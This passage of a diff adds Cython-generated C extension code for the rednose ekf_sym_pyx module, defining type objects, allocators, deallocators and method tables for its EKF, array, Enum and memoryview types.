__pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx_slots, +}; +#else + +static PyTypeObject __pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx = { + PyVarObject_HEAD_INIT(0, 0) + "rednose.helpers.ekf_sym_pyx.""EKF_sym_pyx", /*tp_name*/ + sizeof(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct_array __pyx_vtable_array; + +static PyObject *__pyx_tp_new_array(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_array_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_array_obj *)o); + p->__pyx_vtab = __pyx_vtabptr_array; + p->mode = ((PyObject*)Py_None); Py_INCREF(Py_None); + p->_format = ((PyObject*)Py_None); Py_INCREF(Py_None); + if (unlikely(__pyx_array___cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_array(PyObject *o) { + struct __pyx_array_obj *p = (struct __pyx_array_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_array) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_array___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + Py_CLEAR(p->mode); + Py_CLEAR(p->_format); + (*Py_TYPE(o)->tp_free)(o); +} +static PyObject *__pyx_sq_item_array(PyObject *o, Py_ssize_t i) { + PyObject *r; + PyObject *x = PyInt_FromSsize_t(i); if(!x) return 0; + r = Py_TYPE(o)->tp_as_mapping->mp_subscript(o, x); + Py_DECREF(x); + return r; +} + +static int __pyx_mp_ass_subscript_array(PyObject *o, PyObject *i, PyObject *v) { + if (v) { + return __pyx_array___setitem__(o, i, v); + } + else { + __Pyx_TypeName o_type_name; + o_type_name = __Pyx_PyType_GetName(Py_TYPE(o)); + PyErr_Format(PyExc_NotImplementedError, + "Subscript deletion not supported by " __Pyx_FMT_TYPENAME, o_type_name); + __Pyx_DECREF_TypeName(o_type_name); + return -1; + } +} + +static PyObject *__pyx_tp_getattro_array(PyObject *o, PyObject *n) { + PyObject *v = __Pyx_PyObject_GenericGetAttr(o, n); + if (!v && PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + v = __pyx_array___getattr__(o, n); + } + return v; +} + +static PyObject *__pyx_getprop___pyx_array_memview(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(o); +} + +static PyMethodDef __pyx_methods_array[] = { + {"__getattr__", (PyCFunction)__pyx_array___getattr__, METH_O|METH_COEXIST, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_array_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_array_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_array[] = { + {(char *)"memview", __pyx_getprop___pyx_array_memview, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +#if !CYTHON_COMPILING_IN_LIMITED_API + +static PyBufferProcs __pyx_tp_as_buffer_array = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_array_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; +#endif +static PyType_Slot __pyx_type___pyx_array_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_array}, + {Py_sq_length, (void *)__pyx_array___len__}, + {Py_sq_item, (void *)__pyx_sq_item_array}, + {Py_mp_length, (void *)__pyx_array___len__}, + {Py_mp_subscript, (void *)__pyx_array___getitem__}, + {Py_mp_ass_subscript, (void *)__pyx_mp_ass_subscript_array}, + {Py_tp_getattro, (void *)__pyx_tp_getattro_array}, + #if defined(Py_bf_getbuffer) + {Py_bf_getbuffer, (void *)__pyx_array_getbuffer}, + #endif + {Py_tp_methods, (void *)__pyx_methods_array}, + {Py_tp_getset, (void *)__pyx_getsets_array}, + {Py_tp_new, (void *)__pyx_tp_new_array}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_array_spec = { + "rednose.helpers.ekf_sym_pyx.array", + sizeof(struct __pyx_array_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_SEQUENCE, + __pyx_type___pyx_array_slots, +}; +#else + +static PySequenceMethods __pyx_tp_as_sequence_array = { + __pyx_array___len__, /*sq_length*/ + 0, /*sq_concat*/ + 0, /*sq_repeat*/ + __pyx_sq_item_array, /*sq_item*/ + 0, /*sq_slice*/ + 0, /*sq_ass_item*/ + 0, /*sq_ass_slice*/ + 0, /*sq_contains*/ + 0, /*sq_inplace_concat*/ + 0, /*sq_inplace_repeat*/ +}; + +static PyMappingMethods __pyx_tp_as_mapping_array = { + __pyx_array___len__, /*mp_length*/ + __pyx_array___getitem__, /*mp_subscript*/ + __pyx_mp_ass_subscript_array, /*mp_ass_subscript*/ +}; + +static PyBufferProcs __pyx_tp_as_buffer_array = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_array_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; + +static PyTypeObject __pyx_type___pyx_array = { + PyVarObject_HEAD_INIT(0, 0) + "rednose.helpers.ekf_sym_pyx.""array", /*tp_name*/ + sizeof(struct __pyx_array_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_array, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + &__pyx_tp_as_sequence_array, /*tp_as_sequence*/ + &__pyx_tp_as_mapping_array, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + __pyx_tp_getattro_array, /*tp_getattro*/ + 0, /*tp_setattro*/ + &__pyx_tp_as_buffer_array, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_SEQUENCE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_array, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_array, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_array, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyObject *__pyx_tp_new_Enum(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + struct __pyx_MemviewEnum_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_MemviewEnum_obj *)o); + p->name = Py_None; Py_INCREF(Py_None); + return o; +} + +static void __pyx_tp_dealloc_Enum(PyObject *o) { + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_Enum) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + Py_CLEAR(p->name); + (*Py_TYPE(o)->tp_free)(o); +} + +static int __pyx_tp_traverse_Enum(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + if (p->name) { + e = (*v)(p->name, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_Enum(PyObject *o) { + PyObject* tmp; + struct __pyx_MemviewEnum_obj *p = (struct __pyx_MemviewEnum_obj *)o; + tmp = ((PyObject*)p->name); + p->name = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + return 0; +} + +static PyObject *__pyx_specialmethod___pyx_MemviewEnum___repr__(PyObject *self, CYTHON_UNUSED PyObject *arg) { + return __pyx_MemviewEnum___repr__(self); +} + +static PyMethodDef __pyx_methods_Enum[] = { + {"__repr__", (PyCFunction)__pyx_specialmethod___pyx_MemviewEnum___repr__, METH_NOARGS|METH_COEXIST, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_MemviewEnum_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_MemviewEnum_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type___pyx_MemviewEnum_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_Enum}, + {Py_tp_repr, (void *)__pyx_MemviewEnum___repr__}, + {Py_tp_traverse, (void *)__pyx_tp_traverse_Enum}, + {Py_tp_clear, (void *)__pyx_tp_clear_Enum}, + {Py_tp_methods, (void *)__pyx_methods_Enum}, + {Py_tp_init, (void *)__pyx_MemviewEnum___init__}, + {Py_tp_new, (void *)__pyx_tp_new_Enum}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_MemviewEnum_spec = { + "rednose.helpers.ekf_sym_pyx.Enum", + sizeof(struct __pyx_MemviewEnum_obj), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, + __pyx_type___pyx_MemviewEnum_slots, +}; +#else + +static PyTypeObject __pyx_type___pyx_MemviewEnum = { + PyVarObject_HEAD_INIT(0, 0) + "rednose.helpers.ekf_sym_pyx.""Enum", /*tp_name*/ + sizeof(struct __pyx_MemviewEnum_obj), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_Enum, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + __pyx_MemviewEnum___repr__, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse_Enum, /*tp_traverse*/ + __pyx_tp_clear_Enum, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_Enum, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_MemviewEnum___init__, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_Enum, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif +static struct __pyx_vtabstruct_memoryview __pyx_vtable_memoryview; + +static PyObject *__pyx_tp_new_memoryview(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_memoryview_obj *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_memoryview_obj *)o); + p->__pyx_vtab = __pyx_vtabptr_memoryview; + p->obj = Py_None; Py_INCREF(Py_None); + p->_size = Py_None; Py_INCREF(Py_None); + p->_array_interface = Py_None; Py_INCREF(Py_None); + p->view.obj = NULL; + if (unlikely(__pyx_memoryview___cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_memoryview(PyObject *o) { + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && !__Pyx_PyObject_GC_IsFinalized(o)) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_memoryview) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + PyObject_GC_UnTrack(o); + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_memoryview___dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + Py_CLEAR(p->obj); + Py_CLEAR(p->_size); + Py_CLEAR(p->_array_interface); + (*Py_TYPE(o)->tp_free)(o); +} + +static int __pyx_tp_traverse_memoryview(PyObject *o, visitproc v, void *a) { + int e; + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + if (p->obj) { + e = (*v)(p->obj, a); if (e) return e; + } + if (p->_size) { + e = (*v)(p->_size, a); if (e) return e; + } + if (p->_array_interface) { + e = (*v)(p->_array_interface, a); if (e) return e; + } + if (p->view.obj) { + e = (*v)(p->view.obj, a); if (e) return e; + } + return 0; +} + +static int __pyx_tp_clear_memoryview(PyObject *o) { + PyObject* tmp; + struct __pyx_memoryview_obj *p = (struct __pyx_memoryview_obj *)o; + tmp = ((PyObject*)p->obj); + p->obj = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->_size); + p->_size = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + tmp = ((PyObject*)p->_array_interface); + p->_array_interface = Py_None; Py_INCREF(Py_None); + Py_XDECREF(tmp); + Py_CLEAR(p->view.obj); + return 0; +} +static PyObject *__pyx_sq_item_memoryview(PyObject *o, Py_ssize_t i) { + PyObject *r; + PyObject *x = PyInt_FromSsize_t(i); if(!x) return 0; + r = Py_TYPE(o)->tp_as_mapping->mp_subscript(o, x); + Py_DECREF(x); + return r; +} + +static int __pyx_mp_ass_subscript_memoryview(PyObject *o, PyObject *i, PyObject *v) { + if (v) { + return __pyx_memoryview___setitem__(o, i, v); + } + else { + __Pyx_TypeName o_type_name; + o_type_name = __Pyx_PyType_GetName(Py_TYPE(o)); + PyErr_Format(PyExc_NotImplementedError, + "Subscript deletion not supported by " __Pyx_FMT_TYPENAME, o_type_name); + __Pyx_DECREF_TypeName(o_type_name); + return -1; + } +} + +static PyObject *__pyx_getprop___pyx_memoryview_T(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_1T_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_base(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4base_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_shape(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_strides(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_suboffsets(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_ndim(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_itemsize(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_nbytes(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(o); +} + +static PyObject *__pyx_getprop___pyx_memoryview_size(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(o); +} + +static PyObject *__pyx_specialmethod___pyx_memoryview___repr__(PyObject *self, CYTHON_UNUSED PyObject *arg) { + return __pyx_memoryview___repr__(self); +} + +static PyMethodDef __pyx_methods_memoryview[] = { + {"__repr__", (PyCFunction)__pyx_specialmethod___pyx_memoryview___repr__, METH_NOARGS|METH_COEXIST, 0}, + {"is_c_contig", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_is_c_contig, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"is_f_contig", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_is_f_contig, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"copy", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_copy, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"copy_fortran", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_memoryview_copy_fortran, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryview_1__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw___pyx_memoryview_3__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_memoryview[] = { + {(char *)"T", __pyx_getprop___pyx_memoryview_T, 0, (char *)0, 0}, + {(char *)"base", __pyx_getprop___pyx_memoryview_base, 0, (char *)0, 0}, + {(char *)"shape", __pyx_getprop___pyx_memoryview_shape, 0, (char *)0, 0}, + {(char *)"strides", __pyx_getprop___pyx_memoryview_strides, 0, (char *)0, 0}, + {(char *)"suboffsets", __pyx_getprop___pyx_memoryview_suboffsets, 0, (char *)0, 0}, + {(char *)"ndim", __pyx_getprop___pyx_memoryview_ndim, 0, (char *)0, 0}, + {(char *)"itemsize", __pyx_getprop___pyx_memoryview_itemsize, 0, (char *)0, 0}, + {(char *)"nbytes", __pyx_getprop___pyx_memoryview_nbytes, 0, (char *)0, 0}, + {(char *)"size", __pyx_getprop___pyx_memoryview_size, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +#if !CYTHON_COMPILING_IN_LIMITED_API + +static PyBufferProcs __pyx_tp_as_buffer_memoryview = { + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getreadbuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getwritebuffer*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getsegcount*/ + #endif + #if PY_MAJOR_VERSION < 3 + 0, /*bf_getcharbuffer*/ + #endif + __pyx_memoryview_getbuffer, /*bf_getbuffer*/ + 0, /*bf_releasebuffer*/ +}; +#endif +static PyType_Slot __pyx_type___pyx_memoryview_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_memoryview}, + {Py_tp_repr, (void *)__pyx_memoryview___repr__}, + {Py_sq_length, (void *)__pyx_memoryview___len__}, + {Py_sq_item, (void *)__pyx_sq_item_memoryview}, + {Py_mp_length, (void *)__pyx_memoryview___len__}, + {Py_mp_subscript, (void *)__pyx_memoryview___getitem__}, + {Py_mp_ass_subscript, (void *)__pyx_mp_ass_subscript_memoryview}, + {Py_tp_str, (void *)__pyx_memoryview___str__}, + #if defined(Py_bf_getbuffer) + {Py_bf_getbuffer, (void *)__pyx_memoryview_getbuffer}, + #endif + {Py_tp_traverse, (void *)__pyx_tp_traverse_memoryview}, + {Py_tp_clear, (void *)__pyx_tp_clear_memoryview}, + {Py_tp_methods, (void *)__pyx_methods_memoryview}, + {Py_tp_getset, (void *)__pyx_getsets_memoryview}, + {Py_tp_new, (void *)__pyx_tp_new_memoryview}, + {0, 0}, +}; +static PyType_Spec __pyx_type___pyx_memoryview_spec = { + "rednose.helpers.ekf_sym_pyx.memoryview", + sizeof(struct __pyx_memoryview_obj), + 0, + 